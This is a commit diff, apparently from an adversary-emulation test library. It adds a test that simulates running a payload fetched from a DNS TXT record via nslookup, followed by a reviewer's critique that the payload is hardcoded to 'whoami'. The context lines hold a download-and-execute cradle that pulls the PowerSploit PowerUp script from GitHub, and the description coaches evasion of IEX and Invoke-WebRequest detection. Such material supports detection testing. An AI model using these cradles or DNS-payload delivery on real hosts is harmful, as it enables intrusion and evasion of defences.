Update for name: Abuse Nslookup with DNS Records (#2248)

* Update for name: Abuse Nslookup with DNS Records

* custom nslookup function

* fix spacing

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
Author: sai prashanth pulisetti
Date: 2022-12-17 01:56:42 +05:30
Committed by: GitHub
Parent: b86d24fd99
Commit: 7fd3529b28
+17
@@ -424,3 +424,20 @@ atomic_tests:
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
name: powershell
- name: Abuse Nslookup with DNS Records
auto_generated_guid: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1
description: |
Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts.
supported_platforms:
- windows
reference : https://twitter.com/jstrosch/status/1237382986557001729
executor:
command: |
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
name: powershell
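Review bot: the executor never actually pulls a payload out of DNS, so this test does not exercise the technique the title and description promise. In the command at the end of the hunk, the `nslookup` wrapper pipes the real `nslookup.exe` output to `Out-Null` and returns the fixed array `@("","whoami")`, so `.(nslookup -q=txt example.com 8.8.8.8)[-1]` always evaluates to `whoami` no matter what the TXT record for example.com contains (or whether the query to 8.8.8.8 succeeded at all, since the exit status is discarded too). The only real DNS activity is a single TXT query, and the executed command is hardcoded in the test file rather than carried by the record. Either point the test at a TXT record the project controls so that the record content is what gets executed, or state plainly in `description` that payload retrieval is simulated and that the observable behavior for detection is the TXT query followed by a child `powershell` process. Two smaller points: `description` should read "Red teamers avoid IEX and Invoke-WebRequest in their PowerShell commands. Instead, host a TXT record with a payload ..." (stray apostrophe, your/their mismatch, and "text record" should be the DNS record type), and `reference :` has a space before the colon that the other keys in this file do not.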